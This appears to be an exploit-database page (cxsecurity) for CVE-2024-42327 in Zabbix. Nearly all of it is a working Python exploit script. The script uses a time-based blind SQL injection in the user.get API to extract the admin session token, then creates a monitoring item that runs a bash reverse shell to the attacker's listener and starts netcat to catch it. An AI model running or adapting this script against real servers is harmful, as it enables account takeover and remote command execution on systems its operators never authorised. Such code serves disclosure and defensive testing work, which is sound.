Zabbix SQL Multiple Vulns

2025.02.19
Credit: godylockz
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ This script is used to exploit CVE-2024-42327 affecting Zabbix servers to leak the admin API authentication token and create an item to achieve a reverse shell. """ # Imports from concurrent.futures import ThreadPoolExecutor from threading import Timer import argparse import netifaces import os import requests import string import sys import urllib.parse # Disable SSL self-signed certificate warnings from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) # Constants RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" ENDC = "\033[0m" ENCODING = "UTF-8" def zabbix_authenticate(): """Authenticate the user and retrieve the API token.""" payload = {"jsonrpc": "2.0", "method": "user.login", "params": {"username": args.username, "password": args.password}, "id": 1} r = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False) if r.status_code == 200: try: response_json = r.json() auth_token = response_json.get("result") if auth_token: print(f"[+] Login successful! {args.username} API auth token: {auth_token}") return auth_token else: print(f"{RED}[-] Login failed. Response: {response_json}{ENDC}") exit() except Exception as e: print(f"{RED}[-] Error: {str(e)}{ENDC}") exit() else: print(f"{RED}[-] HTTP request failed with status code {r.status_code}{ENDC}") exit() def send_injection(auth_token, position, char): """Send an SQL injection payload and measure the response time.""" payload = { "jsonrpc": "2.0", "method": "user.get", "params": { "output": ["userid", "username"], "selectRole": [ "roleid", f"name AND (SELECT * FROM (SELECT(SLEEP({args.sleep_time} - " f"(IF(ORD(MID((SELECT sessionid FROM zabbix.sessions " f"WHERE userid=1 and status=0 LIMIT {args.row},1), " f"{position}, 1))={ord(char)}, 0, {args.sleep_time})))))BEEF)", ], "editable": 1, }, "auth": auth_token, "id": 1, } r = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False) response_time = r.elapsed.total_seconds() return char, response_time def extract_api_token_parallel(auth_token, position, charset=string.printable): """Extract the API token (multi-threaded).""" with ThreadPoolExecutor(max_workers=args.threads) as executor: futures = {executor.submit(send_injection, auth_token, position, char): char for char in charset} for future in futures: char, response_time = future.result() if args.sleep_time < response_time < args.sleep_time + 0.5: return char return None def get_host_ids(api_token_admin): """Retrieve current host IDs and their associated interface IDs.""" payload = {"jsonrpc": "2.0", "method": "host.get", "params": {"output": ["hostid", "host"], "selectInterfaces": ["interfaceid"]}, "auth": api_token_admin, "id": 1} response = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False) if response.status_code == 200: try: response_json = response.json() print(f"[*] host.get response: {response_json}") result = response_json.get("result", []) if result: host_id = result[0]["hostid"] interface_id = result[0]["interfaces"][0]["interfaceid"] return host_id, interface_id else: print(f"{RED}[-] No hosts found in the response.{ENDC}") return None, None except Exception as e: print(f"{RED}[-] Error parsing response: {str(e)}{ENDC}") return None, None else: print(f"{RED}[-] Failed to retrieve host IDs. HTTP status code: {response.status_code}{ENDC}") return None, None def send_reverse_shell_request(api_token_admin, host_id, interface_id): """Create an item with a reverse shell payload.""" payload = { "jsonrpc": "2.0", "method": "item.create", "params": { "name": "rce", "key_": f'system.run[bash -c "bash -i >& /dev/tcp/{args.listen_ip}/{args.listen_port} 0>&1"]', "delay": 1, "hostid": host_id, "type": 0, "value_type": 1, "interfaceid": interface_id, }, "auth": api_token_admin, "id": 1, } try: requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False) except requests.exceptions.Timeout: pass # Ignore timeout error if __name__ == "__main__": # Parse arguments parser = argparse.ArgumentParser(description="POC for CVE-2024-42327 (Zabbix admin API token leak)") parser.add_argument("-t", "--url", help="Zabbix Target URL", required=True) parser.add_argument("-u", "--username", help="Zabbix username", required=True) parser.add_argument("-p", "--password", help="Zabbix password", required=True) parser.add_argument("--listen-ip", help="Listening IP / Interface", default="tun0") parser.add_argument("--listen-port", type=int, help="Listening Port", default=4444) parser.add_argument("--threads", type=int, help="Threads", default=10) parser.add_argument("--sleep-time", type=int, help="Sleep time", default=1) parser.add_argument("--row", type=int, help="Row index", default=0) parser.add_argument("--length", type=int, help="Max length", default=32) parser.add_argument( "-a", "--useragent", type=str, required=False, help="User agent to use when sending requests", default="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36", ) parser.add_argument("-x", "--proxy", type=str, required=False, help="HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)") parser.add_argument("-v", "--verbose", action="store_true", required=False, help="Verbosity enabled - additional output flag") args = parser.parse_args() # Input-checking if not args.url.startswith("http://") and not args.url.startswith("https://"): args.url = "http://" + args.url args.url = urllib.parse.urlparse(args.url).geturl().strip("/").replace("api_jsonrpc.php", "") + "/api_jsonrpc.php" if args.proxy: proxies = {"http": args.proxy, "https": args.proxy} else: proxies = {} headers = {"User-Agent": args.useragent, "Content-Type": "application/json"} if args.listen_ip.count(".") != 3: try: args.listen_ip = netifaces.ifaddresses(args.listen_ip)[netifaces.AF_INET][0]["addr"] except: print(f"{RED}[-] Invalid interface/ip {args.listen_ip}{ENDC}") exit() print("[*] Authenticating ...") api_token = zabbix_authenticate() print("[*] Starting data extraction ...") api_token_admin = "" for position in range(len(api_token_admin) + 1, args.length + 1): for _ in range(1, 3): char = extract_api_token_parallel(api_token, position) if char and extract_api_token_parallel(api_token, position, char): api_token_admin += char sys.stdout.write(f"\r[*] Extracting admin API auth token: {api_token_admin}") sys.stdout.flush() break print("\n[*] Getting host IDs ...") host_id, interface_id = get_host_ids(api_token_admin) if host_id and interface_id: print("[*] Starting listener and sending reverse shelll ...") t = Timer( interval=1, function=send_reverse_shell_request, args=( api_token_admin, host_id, interface_id, ), ) t.start() os.system(f"nc -lnvp {args.listen_port}") else: print(f"{RED}[-] Failed to retrieve host or interface ID.{ENDC}")


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top